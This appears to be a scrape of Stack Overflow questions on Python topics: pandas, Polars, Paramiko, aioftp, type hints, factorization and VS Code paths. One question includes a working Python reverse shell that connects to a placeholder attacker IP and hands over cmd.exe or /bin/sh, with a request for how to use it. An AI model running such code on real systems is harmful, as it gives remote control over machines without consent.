if not message.author.voice:
await message.channel.send("You need to be in a voice channel to use this command.")
return
# Connect to the user's voice channel if not already connected
if message.guild.id not in voice_clients or not voice_clients[message.guild.id].is_connected():
voice_client = await message.author.voice.channel.connect()
voice_clients[message.guild.id] = voice_client
else:
voice_client = voice_clients[message.guild.id]
# Extract the YouTube URL from the command
url = message.content.split()[1]
# Download and extract audio using yt-dlp
with YoutubeDL(YDL_OPTIONS) as ydl:
info = ydl.extract_info(url, download=False)
audio_url = info["url"]
title = info.get("title", "Unknown Title")
# Debug: Print the extracted audio URL
print(f"Audio URL: {audio_url}")
# Play the audio using FFmpeg
source = FFmpegPCMAudio(audio_url, **FFMPEG_OPTIONS)
voice_client.play(source, after=lambda e: print("Playback finished."))
# Notify the user
await message.channel.send(f"Now playing: {title}")
except Exception as e:
print(f"Error: {e}")
await message.channel.send("An error occurred while trying to play the audio.")
</code></pre>
|
<python><ffmpeg><discord>
|
2025-01-18 16:08:21
| 0
| 317
|
Deeroy
|
79,367,389
| 14,358,734
|
Why am I getting "raise source.error("multiple repeat", re.error: multiple repeat at position 2" when trying to save data frames to csv files?
|
<p>The code is attached below. It works fine until it gets to <code>ai: df_ai</code> in the <code>database</code> dict.</p>
<pre><code>data = pd.read_csv('survey_results_public.csv')
df_demographics = data[['ResponseId', 'MainBranch', 'Age', 'Employment', 'EdLevel', 'YearsCode', 'Country']]
df_learn_code = data[['ResponseId', 'LearnCode']]
df_language = data[['ResponseId', 'LanguageAdmired']]
df_ai = data[['ResponseId', 'AISelect', 'AISent', 'AIAcc', 'AIComplex', 'AIThreat', 'AIBen', 'AIToolCurrently Using']]
database = {'demographics': df_demographics, 'learn_code': df_learn_code, 'language': df_language, 'ai': df_ai}
def find_semicolons(dataframe):
result = []
firstFifty = dataframe.head(50)
for column in firstFifty.columns:
if firstFifty[column].apply(lambda x: ';' in str(x)).any():
result.append(column)
return result
def transform_dataframe(dataframe):
result = find_semicolons(dataframe)
for column in result:
values = [str(x).split(';') for x in dataframe[column].unique().tolist()]
flat_values = []
for x in values:
flat_values.extend(x)
flat_values = set(flat_values)
for x in flat_values:
dataframe[x] = dataframe[column].str.contains(x, na=False).astype(int)
for x in database:
transform_dataframe(database.get(x))
database.get(x).to_csv(x + '.csv')
</code></pre>
<p>Here's the traceback</p>
<pre><code>Traceback (most recent call last):
File "/Users/shalim/PycharmProjects/work/stackoverflow.py", line 45, in <module>
transform_dataframe(database.get(x))
File "/Users/shalim/PycharmProjects/work/stackoverflow.py", line 40, in transform_dataframe
dataframe[x] = dataframe[column].str.contains(x, na=False).astype(int)
File "/Users/shalim/PycharmProjects/work/venv/lib/python3.9/site-packages/pandas/core/strings/accessor.py", line 137, in wrapper
return func(self, *args, **kwargs)
File "/Users/shalim/PycharmProjects/work/venv/lib/python3.9/site-packages/pandas/core/strings/accessor.py", line 1327, in contains
if regex and re.compile(pat).groups:
File "/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.9/lib/python3.9/re.py", line 252, in compile
return _compile(pattern, flags)
File "/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.9/lib/python3.9/re.py", line 304, in _compile
p = sre_compile.compile(pattern, flags)
File "/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.9/lib/python3.9/sre_compile.py", line 764, in compile
p = sre_parse.parse(p, flags)
File "/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.9/lib/python3.9/sre_parse.py", line 948, in parse
p = _parse_sub(source, state, flags & SRE_FLAG_VERBOSE, 0)
File "/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.9/lib/python3.9/sre_parse.py", line 443, in _parse_sub
itemsappend(_parse(source, state, verbose, nested + 1,
File "/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.9/lib/python3.9/sre_parse.py", line 671, in _parse
raise source.error("multiple repeat",
re.error: multiple repeat at position 2
</code></pre>
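<p>For what it's worth, "multiple repeat at position 2" is consistent with one of the split values being an invalid regular expression (for example a survey answer like "C++", where the second "+" is a repeat of a repeat): <code>str.contains</code> treats its pattern as a regex by default. A sketch of the literal-match variant, assuming the same loop as above:</p>
<pre class="lang-py prettyprint-override"><code># Treat each split value as a literal string, not a regex pattern.
for x in flat_values:
    dataframe[x] = dataframe[column].str.contains(x, na=False, regex=False).astype(int)

# Equivalent alternative if regex matching must stay enabled:
# import re
# dataframe[x] = dataframe[column].str.contains(re.escape(x), na=False).astype(int)
</code></pre>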
|
<python><pandas><dataframe>
|
2025-01-18 15:08:59
| 1
| 781
|
m. lekk
|
79,366,943
| 14,358,734
|
Best way to turn every cell in a dataframe into its own row in a new dataframe?
|
<p>Suppose I have a dataframe <code>Old</code> with columns <code>A</code>, <code>B</code>, and <code>C</code>. I want a new dataframe <code>New</code> with two columns, <code>D</code> and <code>E</code>. For each cell in <code>Old</code>, I want a corresponding row in <code>New</code> where <code>D</code> holds the cell's value and <code>E</code> holds the name of the column the cell came from.</p>
<p>I know that straight up iterating over a dataframe is bad, but that's how I did it. Here, I only cared about some column names in the <code>Old</code> dataframe, so if the cell wasn't under a column I cared about, I just assigned it the value <code>other</code>. But the principle is the same.</p>
<pre><code>for column in df.columns:
for entry in df[column]:
entries.append(entry)
labels.append(column_labels.get(column, "other")) # Assign label based on column
</code></pre>
<p>My question is what are some better ways to do this? Running this will become exceedingly slow as the dataset grows.</p>
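<p>For reference, a minimal sketch of the vectorized reshape with <code>DataFrame.melt</code> (column names follow the D/E naming above; the <code>column_labels</code> mapping is illustrative):</p>
<pre class="lang-py prettyprint-override"><code>import pandas as pd

Old = pd.DataFrame({"A": [1, 2], "B": [3, 4], "C": [5, 6]})

# One row per cell: E holds the originating column name, D the cell value.
New = Old.melt(var_name="E", value_name="D")[["D", "E"]]

# Optionally collapse columns that are not of interest into "other"
column_labels = {"A": "first", "B": "second"}
New["E"] = New["E"].map(lambda c: column_labels.get(c, "other"))
</code></pre>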
|
<python><pandas><dataframe>
|
2025-01-18 10:13:46
| 1
| 781
|
m. lekk
|
79,366,590
| 16,383,578
|
How to correctly implement Fermat's factorization in Python?
|
<p>I am trying to implement efficient prime factorization algorithms in Python. This is not homework or work related, it is completely out of curiosity.</p>
<p>I have learned that prime factorization is <a href="https://en.wikipedia.org/wiki/Integer_factorization#Time_complexity" rel="nofollow noreferrer">very hard</a>:</p>
<p>I want to implement efficient algorithms for this as a self-imposed challenge. I have set out to implement <a href="https://en.wikipedia.org/wiki/Fermat%27s_factorization_method" rel="nofollow noreferrer">Fermat's factorization method</a> first, as it seems simple enough.</p>
<p>Python code directly translated from the pseudocode:</p>
<pre><code>def Fermat_Factor(n):
a = int(n ** 0.5 + 0.5)
b2 = abs(a**2 - n)
while int(b2**0.5) ** 2 != b2:
a += 1
b2 = a**2 - n
return a - b2**0.5, a + b2**0.5
</code></pre>
<p>(I have to use <code>abs</code> otherwise <code>b2</code> will easily be negative and <code>int</code> cast will fail with <code>TypeError</code> because the root is <code>complex</code>)</p>
<p>As you can see, it returns two integers whose product equals the input, but it only returns two outputs and it doesn't guarantee primality of the factors. I have no idea how efficient this algorithm is, but factorization of semiprimes using this method is much more efficient than the trial division method used in my previous question: <a href="https://stackoverflow.com/questions/79365706/">Why factorization of products of close primes is much slower than products of dissimilar primes</a>.</p>
<pre><code>In [20]: %timeit FermatFactor(3607*3803)
2.1 μs ± 28.2 ns per loop (mean ± std. dev. of 7 runs, 100,000 loops each)
In [21]: FermatFactor(3607*3803)
Out[21]: [3607, 3803]
In [22]: %timeit FermatFactor(3593 * 3671)
1.69 μs ± 31 ns per loop (mean ± std. dev. of 7 runs, 1,000,000 loops each)
In [23]: FermatFactor(3593 * 3671)
Out[23]: [3593, 3671]
In [24]: %timeit FermatFactor(7187 * 7829)
4.94 μs ± 47.4 ns per loop (mean ± std. dev. of 7 runs, 100,000 loops each)
In [25]: FermatFactor(7187 * 7829)
Out[25]: [7187, 7829]
In [26]: %timeit FermatFactor(8087 * 8089)
1.38 μs ± 12.9 ns per loop (mean ± std. dev. of 7 runs, 1,000,000 loops each)
In [27]: FermatFactor(8087 * 8089)
Out[27]: [8087, 8089]
</code></pre>
<p>So I want to use this algorithm to generate all prime factors of any given integer (of course I know this only works with odd integers, but that is not an issue since powers of two can be trivially factored out using bit hacking). The easiest way I can think of is to recursively call <code>Fermat_Factor</code> until <code>n</code> is a prime. I don't know how to check if a number is prime in this algorithm, but I noticed something:</p>
<pre><code>In [3]: Fermat_Factor(3)
Out[3]: (1.0, 3.0)
In [4]: Fermat_Factor(5)
Out[4]: (1.0, 3.0)
In [5]: Fermat_Factor(7)
Out[5]: (1.0, 7.0)
In [6]: Fermat_Factor(11)
Out[6]: (1.0, 11.0)
In [7]: Fermat_Factor(13)
Out[7]: (1.0, 13.0)
In [8]: Fermat_Factor(17)
Out[8]: (3.0, 5.0)
In [9]: Fermat_Factor(19)
Out[9]: (1.0, 19.0)
In [10]: Fermat_Factor(23)
Out[10]: (1.0, 23.0)
In [11]: Fermat_Factor(29)
Out[11]: (3.0, 7.0)
In [12]: Fermat_Factor(31)
Out[12]: (1.0, 31.0)
In [13]: Fermat_Factor(37)
Out[13]: (5.0, 7.0)
In [14]: Fermat_Factor(41)
Out[14]: (1.0, 41.0)
</code></pre>
<p>The first number in the output of this algorithm for many primes is 1, but not all, as such it cannot be used to determine when the recursion should stop. I learned it the hard way.</p>
<p>So I just settled to use membership checking of a pregenerated set of primes instead. Naturally this will cause <code>RecursionError: maximum recursion depth exceeded</code> when the input is a prime larger than the maximum of the set. As I don't have infinite memory, this is to be considered implementation detail.</p>
<p>So I have implemented a working version (for some inputs), but for some valid inputs (products of primes within the limit) somehow the algorithm doesn't give the correct output:</p>
<pre><code>import numpy as np
from itertools import cycle
TRIPLE = ((4, 2), (9, 6), (25, 10))
WHEEL = ( 4, 2, 4, 2, 4, 6, 2, 6 )
def prime_sieve(n):
primes = np.ones(n + 1, dtype=bool)
primes[:2] = False
for square, double in TRIPLE:
primes[square::double] = False
wheel = cycle(WHEEL)
k = 7
while (square := k**2) <= n:
if primes[k]:
primes[square::2*k] = False
k += next(wheel)
return np.flatnonzero(primes)
PRIMES = list(map(int, prime_sieve(1048576)))
PRIME_SET = set(PRIMES)
TEST_LIMIT = PRIMES[-1] ** 2
def FermatFactor(n):
if n > TEST_LIMIT:
raise ValueError('Number too large')
if n in PRIME_SET:
return [n]
a = int(n ** 0.5 + 0.5)
if a ** 2 == n:
return FermatFactor(a) + FermatFactor(a)
b2 = abs(a**2 - n)
while int(b2**0.5) ** 2 != b2:
a += 1
b2 = a**2 - n
return FermatFactor(factor := int(a - b2**0.5)) + FermatFactor(n // factor)
</code></pre>
<p>It works for many inputs:</p>
<pre><code>In [18]: FermatFactor(255)
Out[18]: [3, 5, 17]
In [19]: FermatFactor(511)
Out[19]: [7, 73]
In [20]: FermatFactor(441)
Out[20]: [3, 7, 3, 7]
In [21]: FermatFactor(3*5*823)
Out[21]: [3, 5, 823]
In [22]: FermatFactor(37*333667)
Out[22]: [37, 333667]
In [23]: FermatFactor(13 * 37 * 151 * 727 * 3607)
Out[23]: [13, 37, 727, 151, 3607]
</code></pre>
<p>But not all:</p>
<pre><code>In [25]: FermatFactor(5 * 53 * 163)
Out[25]: [163, 13, 2, 2, 5]
In [26]: FermatFactor(3*5*73*283)
Out[26]: [17, 3, 7, 3, 283]
In [27]: FermatFactor(3 * 11 * 29 * 71 * 137)
Out[27]: [3, 11, 71, 61, 7, 3, 3]
</code></pre>
<p>Why is this the case? How can I fix it?</p>
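<p>For reference, a hedged diagnosis consistent with the failing examples: <code>int(n ** 0.5 + 0.5)</code> can start <em>below</em> the ceiling of the square root (for n = 265 it starts at a = 16 although <code>16**2 &lt; 265</code>), and the <code>abs()</code> then lets the negative <code>a**2 - n</code> pass the perfect-square test, so a bogus factor is returned; float square roots also lose precision for larger n. An integer-only sketch of the Fermat step using <code>math.isqrt</code>:</p>
<pre class="lang-py prettyprint-override"><code>import math

def fermat_factor_exact(n):
    """Single Fermat step for odd n: returns one pair of factors (possibly 1 and n)."""
    a = math.isqrt(n)
    if a * a < n:
        a += 1                      # start at ceil(sqrt(n)) so a*a - n >= 0
    b2 = a * a - n
    while math.isqrt(b2) ** 2 != b2:
        a += 1
        b2 = a * a - n
    b = math.isqrt(b2)
    return a - b, a + b
</code></pre>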
|
<python><algorithm><prime-factoring>
|
2025-01-18 05:11:57
| 1
| 3,930
|
Ξένη Γήινος
|
79,366,465
| 1,997,852
|
How to connect to old SSH server with paramiko?
|
<p>I have an older SSH server which does not support modern cryptography. Logging in with OpenSSH requires these options:</p>
<pre><code>KexAlgorithms=+diffie-hellman-group1-sha1
HostKeyAlgorithms=+ssh-dss
Ciphers=+aes256-cbc
</code></pre>
<p>I'm trying to connect with python Paramiko using this code:</p>
<pre class="lang-py prettyprint-override"><code>client = paramiko.SSHClient()
client.connect(
hostname,
username=username,
password=password,
look_for_keys=False
)
</code></pre>
<p>And I get this error:</p>
<pre><code> File ".venv/lib/python3.10/site-packages/paramiko/dsskey.py", line 152, in verify_ssh_sig
key = dsa.DSAPublicNumbers(
ValueError: p must be exactly 1024, 2048, 3072, or 4096 bits long
</code></pre>
<p>I think it's trying to use DSA and I need to make it use DSS instead but I'm not sure.</p>
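<p>A hedged sketch of one way to opt in to those legacy algorithms (variable names reuse those from the snippet above; whether the algorithms are still available depends on the installed Paramiko and cryptography versions): build the <code>Transport</code> yourself and narrow its <code>SecurityOptions</code> before connecting.</p>
<pre class="lang-py prettyprint-override"><code>import paramiko

transport = paramiko.Transport((hostname, 22))
opts = transport.get_security_options()
opts.kex = ("diffie-hellman-group1-sha1",)   # legacy key exchange
opts.key_types = ("ssh-dss",)                # legacy (DSA) host key type
opts.ciphers = ("aes256-cbc",)               # legacy cipher

transport.connect(username=username, password=password)
channel = transport.open_session()
channel.exec_command("uname -a")
print(channel.recv(4096).decode())
transport.close()
</code></pre>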
|
<python><ssh><paramiko>
|
2025-01-18 02:08:57
| 0
| 1,217
|
Elliott B
|
79,366,457
| 2,072,516
|
Getting VSCode to extend path to a different directory
|
<p>My project structure is:</p>
<pre><code>.
└── src
├── app
└── scripts
</code></pre>
<p>Previously, <code>app</code> and <code>scripts</code> were at the top level, and <code>app</code> was called <code>src</code>. In scripts, I often refer to the app code, and so have</p>
<pre><code>sys.path.append(str((code_path / "app").resolve()))
</code></pre>
<p>in there, so it access the code. Previously, VSCode was able to make the connection and I could do things like ctrl + click on a module and it would take me to the module in the former src/now app folder. However now, VSCode gives me error squiggles under all the module imports, as it can't find them, relatively speaking. I'd like to tell VSCode to include <code>src/app</code> into it's search path for code.</p>
<p>EDIT: Thanks to a comment by JonSG, I added</p>
<pre><code>"terminal.integrated.env.linux": {
"PYTHONPATH": "${env:PYTHONPATH}:${workspaceFolder}/src/app"
},
</code></pre>
<p>to my settings, but it didn't help.</p>
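<p>For reference: the <code>terminal.integrated.env.*</code> settings only affect terminals that VS Code spawns; Pylance's import resolution (the squiggles and Ctrl+click navigation) is controlled by <code>python.analysis.extraPaths</code>. A sketch of the workspace <code>settings.json</code>, assuming the layout above:</p>
<pre><code>{
    "python.analysis.extraPaths": [
        "./src/app"
    ]
}
</code></pre>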
|
<python><visual-studio-code>
|
2025-01-18 01:59:32
| 1
| 3,210
|
Rohit
|
79,366,429
| 1,574,054
|
Matplotlib legend not respecting content size with lualatex
|
<p>I need to generate my matplotlib plots using <code>lualatex</code> instead of <code>pdflatex</code>. Among other things, I am using <code>fontspec</code> to change the document fonts. Below I am using this as an example and set <code>lmroman10-regular.otf</code> as the font. This creates a few issues. One is that the handles in the legends are not fully centered and are followed by some whitespace before the right border:</p>
<p><a href="https://i.sstatic.net/BiKtskzu.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/BiKtskzu.png" alt="A big red arrow point at whitespace after the label text and before the right border of the legend." /></a></p>
<p>The python code generating the intermediate <code>.pgf</code> file looks like this:</p>
<pre class="lang-py prettyprint-override"><code>import matplotlib
import numpy
from matplotlib import pyplot
x = numpy.linspace(-1, 1)
y = x ** 2
matplotlib.rcParams["figure.figsize"] = (3, 2.5)
matplotlib.rcParams["font.family"] = "serif"
matplotlib.rcParams["font.size"] = 10
matplotlib.rcParams["legend.fontsize"] = 8
matplotlib.rcParams["pgf.texsystem"] = "lualatex"
PREAMBLE = r"""\usepackage{ifluatex}
\ifluatex
\usepackage{fontspec}
\setmainfont{lmroman10-regular.otf}
\fi
"""
matplotlib.rcParams["text.latex.preamble"] = PREAMBLE
matplotlib.rcParams["pgf.preamble"] = PREAMBLE
matplotlib.rcParams["text.usetex"] = True
pyplot.plot(x, y, label="this is the data")
pyplot.legend()
pyplot.xlabel("xlabel")
pyplot.tight_layout()
pyplot.savefig("lualatex_test.pgf")
</code></pre>
<p>The <code>.pgf</code> file is then embedded in a LaTeX document. It seems it is not possible to compile directly to <code>.pdf</code>, since then the document font will not be the selected font, which can for example be seen by setting the font to something more distinct like <code>AntPoltExpd-Italic.otf</code>. Also note that the <code>\ifluatex</code> statement has to be added around the <code>lualatex</code>-only code, since <code>matplotlib</code> uses <code>pdflatex</code> to determine the dimensions of text fragments, as will be seen below.</p>
<p>For the sake of this simple example, the <code>.tex</code> file to render the <code>.pgf</code> may be just:</p>
<pre class="lang-tex prettyprint-override"><code>\documentclass[11pt]{scrbook}
\usepackage{pgf}
\usepackage{fontspec}
\setmainfont{lmroman10-regular.otf}
\newcommand{\mathdefault}[1]{#1}
\begin{document}
\input{lualatex_test.pgf}
\end{document}
</code></pre>
<p>which can be typeset using <code>lualatex <filename></code> and results in the figure shown above (without the red arrow).</p>
<p>I thought I had identified the reason for this but it seems I missed something. As mentioned above, matplotlib computes the dimensions of the text patches by actually placing them in a latex templated and compiling it using <code>pdflatex</code>. This happens in the <a href="https://github.com/matplotlib/matplotlib/blob/3b54c6abab3e88880002c5666d626a294aa7126b/lib/matplotlib/texmanager.py#L56" rel="nofollow noreferrer"><code>matplotlib.texmanager.TexManager</code></a> class in the corresponding <a href="https://github.com/matplotlib/matplotlib/blob/main/lib/matplotlib/texmanager.py" rel="nofollow noreferrer">file on the main branch</a> for example. I thought I could fix it like this:</p>
<pre class="lang-py prettyprint-override"><code>
class TexManager:
...
@classmethod
def get_text_width_height_descent(cls, tex, fontsize, renderer=None):
"""Return width, height and descent of the text."""
if tex.strip() == '':
return 0, 0, 0
dvifile = cls.make_dvi(tex, fontsize)
dpi_fraction = renderer.points_to_pixels(1.) if renderer else 1
with dviread.Dvi(dvifile, 72 * dpi_fraction) as dvi:
page, = dvi
# A total height (including the descent) needs to be returned.
w = page.width
# !!!
if tex == "this is the data":
w /= 1.14
print("fixed width")
# !!!
return w, page.height + page.descent, page.descent
</code></pre>
<p>which, to my understanding, should trick matplotlib into thinking the text is shorter by a factor of 1.14 (just a guess, should be adapted once the solution works). The code definitely gets called, since "fixed width" gets printed. But the gap is not fixed:</p>
<p><a href="https://i.sstatic.net/rU8xQqKk.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/rU8xQqKk.png" alt="Nearly the same as the first figure, without the arrow." /></a></p>
<p>How can I fix this issue? How is matplotlib computing the legend content's width and can I maybe patch this to account for the correct width? Let's assume I know that the width error factor for the font size 8 is approximately 1.14. I can easily determine this for other fonts and font sizes.</p>
|
<python><matplotlib><latex><tex><pgf>
|
2025-01-18 01:22:40
| 1
| 4,589
|
HerpDerpington
|
79,366,388
| 11,062,613
|
How to efficiently upsert (update+insert) large datasets with Polars
|
<p>I am working with large datasets stored in Parquet files and need to perform an upsert (update + insert) operation using Polars. If the files grow to a couple of GBs, I run into memory issues and the update operation fails. My system has 16 GB of RAM.</p>
<p>Here’s a simplified example where I generate a large dataset and a smaller dataset for updating:</p>
<pre><code>import polars as pl
def generate_data(groups, nids, ncols, f=1.0):
symbols = pl.LazyFrame({'group': groups})
ids = pl.LazyFrame({'id': pl.arange(nids, dtype=pl.Int64, eager=True)})
cols_expr = [pl.lit(i*f, dtype=pl.Float64).alias(f'val_{i}') for i in range(1, ncols+1)]
return symbols.join(ids, how='cross').with_columns(cols_expr).collect()
# Generate large dataset
df_old = generate_data(groups=list('ABCDEFGHIJKLMNOPQRSTUVWXYZ'), nids=10**7, ncols=4)
print(f'df_old: {round(df_old.estimated_size()/10**9, 3)} GB')
# df_old: 10.66 GB
# Generate relatively small dataset update
df_new = generate_data(groups=['A', 'D', 'XYZ'], nids=10**4, ncols=4, f=10.)
print(f'df_new: {round(df_new.estimated_size()/10**9, 3)} GB')
# df_new: 0.001 GB
# Update fails probably due to memory issues
df = df_old.update(df_new, on=['group', 'id'], how='full').sort(['group', 'id'])
print(df)
# The kernel died, restarting...
# Polars version 1.17.1
</code></pre>
<p>The above code works with smaller datasets, but when the data size increases (e.g., df_old being 10 GB), I encounter kernel crashes.</p>
<p>What is the most memory-efficient way to perform an upsert on large datasets using Polars?
Are there strategies to avoid memory issues while updating large datasets?</p>
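<p>A hedged sketch of a lower-memory pattern (API names per recent Polars releases; exact behaviour may vary): keep both sides lazy, express the upsert as an anti-join plus concat, and stream the result to Parquet with <code>sink_parquet</code> instead of collecting it. The file paths below are illustrative.</p>
<pre class="lang-py prettyprint-override"><code>import polars as pl

keys = ["group", "id"]

lf_old = pl.scan_parquet("old.parquet")
lf_new = pl.scan_parquet("new.parquet")

# Rows of the old data whose keys are NOT being updated, plus all new rows.
upserted = pl.concat([
    lf_old.join(lf_new, on=keys, how="anti"),
    lf_new,
])

# Stream to disk without materializing the full result in RAM.
# (A global sort would force materialization, so it is omitted here.)
upserted.sink_parquet("merged.parquet")
</code></pre>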
|
<python><parquet><python-polars>
|
2025-01-18 00:25:53
| 1
| 423
|
Olibarer
|
79,366,360
| 1,144,854
|
Type hinting Python inheritance “Base classes of [child] are mutually incompatible”
|
<p>I'm trying to learn how to use base classes and inheritance. I'm getting type-checking errors, but the code is running as expected. Do I have type checker problems, type hinting problems, or meaningful code problems?</p>
<p>Here I try a <a href="https://docs.python.org/3/reference/compound_stmts.html#generic-classes" rel="nofollow noreferrer">generic class</a> that inherits from the abstract base class <a href="https://docs.python.org/3/library/collections.abc.html#collections.abc.Sequence" rel="nofollow noreferrer">Sequence</a> (and <a href="https://docs.python.org/3/library/abc.html#abc.ABC" rel="nofollow noreferrer">ABC</a>—is that necessary?). Then I make child classes where that sequence is specifically a list or a tuple. Pylance/pyright is happy with this and it runs fine:</p>
<pre class="lang-py prettyprint-override"><code>from __future__ import annotations
from abc import ABC
from collections.abc import Iterable, Sequence
class Row[T](Sequence[T], ABC):
def __init__(self, iterable: Iterable[T]):
...
class Row_Mutable[T](list[T], Row[T]):
def __init__(self, iterable):
super().__init__(iterable)
class Row_Immutable[T](tuple[T], Row[T]):
def __init__(self, iterable):
super().__init__(iterable)
row_mut_int: Row_Mutable[int] = Row_Mutable(range(10))
row_mut_str: Row_Mutable[str] = Row_Mutable('abcdefg')
row_imm_int: Row_Immutable[int] = Row_Immutable(range(10))
row_imm_str: Row_Immutable[str] = Row_Immutable('abcdefg')
</code></pre>
<p>Now a 2D version. This is a Sequence of Sequences, so the children are list of lists and tuple of tuples:</p>
<pre class="lang-py prettyprint-override"><code>class Grid[T](Sequence[Sequence[T]], ABC):
def __init__(self, iterable: Iterable[Iterable[T]]):
...
class Grid_Mutable[T](list[list[T]], Grid[T]):
def __init__(self, iter_of_iter):
super().__init__(list(row) for row in iter_of_iter)
class Grid_Immutable[T](tuple[tuple[T]], Grid[T]):
def __init__(self, iter_of_iter):
super().__init__(tuple(row) for row in iter_of_iter)
</code></pre>
<p>Now Pylance/pyright calls out the class definitions:</p>
<pre class="lang-none prettyprint-override"><code>Base classes of Grid_Mutable are mutually incompatible
Base class "Grid[T@Grid_Mutable]" derives from "Sequence[Sequence[T@Grid_Mutable]]" which is incompatible with type "Sequence[list[T@Grid_Mutable]]"
</code></pre>
<p>... and the equivalent for the tuple version.</p>
<p>How is <code>Sequence[Sequence[T]]</code> incompatible with <code>Sequence[list[T]]</code>? How <em>should</em> I code and hint something like this?</p>
<p>Copilot suggested the <code>T = TypeVar('T')</code> form rather than <code>Grid[T]</code>; that slightly changed the errors but didn't resolve them. I'm running Python 3.13 and I'm not concerned about backwards compatibility—more about best practices and Pythonicness.</p>
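<p>A hedged sketch of one possible restructuring (a judgment call, not the only option): parameterize the ABC over the <em>row</em> type, so each concrete class inherits exactly one <code>Sequence[...]</code> parameterization instead of two conflicting ones.</p>
<pre class="lang-py prettyprint-override"><code>from __future__ import annotations
from abc import ABC
from collections.abc import Iterable, Sequence

class Grid[RowT: Sequence](Sequence[RowT], ABC):
    def __init__(self, iterable: Iterable[Iterable]):
        ...

# list[list[T]] and Grid[list[T]] now both derive from Sequence[list[T]].
class Grid_Mutable[T](list[list[T]], Grid[list[T]]):
    def __init__(self, iter_of_iter: Iterable[Iterable[T]]):
        super().__init__(list(row) for row in iter_of_iter)

grid: Grid_Mutable[int] = Grid_Mutable([[1, 2], [3, 4]])
</code></pre>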
|
<python><generics><python-typing><pyright>
|
2025-01-17 23:57:00
| 3
| 763
|
Jacktose
|
79,367,703
| 1,701,812
|
Connect to reverse shell
|
<p>I have reverse shell code in python:</p>
<pre class="lang-py prettyprint-override"><code>#!/usr/bin/env python3
import socket, subprocess, os
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("attacker_ip", attacker_port))
if os.name == 'nt':
subprocess.call(["cmd.exe"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
else:
subprocess.call(["/bin/sh", "-i"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
</code></pre>
<p>I put IP address and port into the code.</p>
<p>But how to connect to this reverse shell from attacker machine?</p>
<p>EDIT: In the end, I need to be able to run commands remotely.</p>
|
<python><shell><reverse-shell>
|
2025-01-17 22:24:56
| 1
| 752
|
pbies
|
79,366,232
| 19,048,408
|
With `aioftp` in Python, how can I recursively list all files in an FTP folder?
|
<p>With <code>aioftp</code> in Python, I want to recursively list all files in an FTP folder.</p>
<p>What's the best way to do that? How can a recursive function be constructed to do that?</p>
<p>Here is my first attempt, which does not work:</p>
<pre class="lang-py prettyprint-override"><code>import aioftp
import asyncio
async def async_list_all_files(
host: str, username: str, password: str, path: str = "/"
) -> list[str]:
async def list_files_recursive_parallel(client: aioftp.Client, path: str = "") -> list[str]:
task_queue: list[asyncio.Future] = []
file_list: list[str] = []
async for entry in client.list(path):
entry_full_path: str = entry[0].as_posix()
# Entry metadata (type hint added)
entry_metadata: dict[str, str | int] = entry[1]
# Handle files and directories
if entry_metadata["type"] == "file":
file_list.append(entry_full_path)
elif entry_metadata["type"] == "dir":
task_queue.append(
asyncio.ensure_future(list_files_recursive_parallel(client, entry_full_path))
)
else:
raise ValueError(
f"Unknown file type: {entry_metadata['type']} from entry='{entry}'"
)
# Process the task queue
if task_queue:
results = await asyncio.gather(*task_queue, return_exceptions=True)
for result in results:
if isinstance(result, list):
file_list.extend(result)
else:
logger.warning(f"Error during task: {result}")
return file_list
async def main() -> list[str]:
client = aioftp.Client()
await client.connect(host)
await client.login(username, password)
# Fetch all files recursively
return await list_files_recursive_parallel(client, path)
# Run the asynchronous `main` function and return results
return await main()
ftp_file_list = asyncio.run(
async_list_all_files(
host=creds["host"],
username=creds["username"],
password=creds["password"],
)
)
</code></pre>
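<p>For reference, a hedged sketch using the <code>recursive=True</code> flag that <code>Client.list</code> accepts in reasonably recent aioftp versions, which may make the hand-rolled recursion unnecessary (host and credentials below are placeholders):</p>
<pre class="lang-py prettyprint-override"><code>import asyncio
import aioftp

async def async_list_all_files(host: str, username: str, password: str, path: str = "/") -> list[str]:
    client = aioftp.Client()
    await client.connect(host)
    await client.login(username, password)
    files: list[str] = []
    # recursive=True walks the whole tree; each entry is (PurePosixPath, metadata dict)
    async for entry_path, info in client.list(path, recursive=True):
        if info["type"] == "file":
            files.append(entry_path.as_posix())
    await client.quit()
    return files

ftp_file_list = asyncio.run(async_list_all_files("ftp.example.com", "user", "password"))
</code></pre>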
|
<python><python-3.x><ftp-client><aio>
|
2025-01-17 22:20:19
| 0
| 468
|
HumpbackWhale194
|
79,366,199
| 2,276,583
|
VS Code no longer can find Python path used by pyenv
|
<p>I have been using VS Code for Python development on Windows 10 for years. For some time, I have been using <code>pyenv-win</code> to manage installed Python versions in Windows. Once I've configured the version of Python I want to use, I create a virtual environment by entering the following in a PowerShell terminal:</p>
<pre><code>python -m venv .venv
</code></pre>
<p>I then follow the standard process of activating the virtual environment and installing packages:</p>
<pre><code>(venv) python -m pip install <stuff>
</code></pre>
<p>In VS Code I have the Microsoft Python extension installed and enabled, along with the Microsoft extensions <code>Python Debugger</code> and <code>Pylance</code>. When I launch VS Code, and open a Python file, I'm prompted to select an interpreter. I navigate to the location of the interpreter in my virtual environment. I have the following configured in my <code>launch.json</code> file for the project:</p>
<pre><code>{
// Use IntelliSense to learn about possible attributes.
// Hover to view descriptions of existing attributes.
// For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
"version": "0.2.0",
"configurations": [
{
"name": "Python Debugger: Current File",
"type": "debugpy",
"request": "launch",
"program": "${file}",
"console": "integratedTerminal",
"justMyCode": false
}
]
}
</code></pre>
<p>This overall configuration has worked for a couple of years.</p>
<p>Starting a few months ago, when attempting to debug a Python file in VS Code, I get the following error in the "Call Stack" panel of the "Run and Debug" pane:</p>
<pre><code>[WinError 3] The system cannot find the path specified: 'C:\\Users\\<username>\\AppData\\Roaming\\Python\\Python310\\site-packages'
</code></pre>
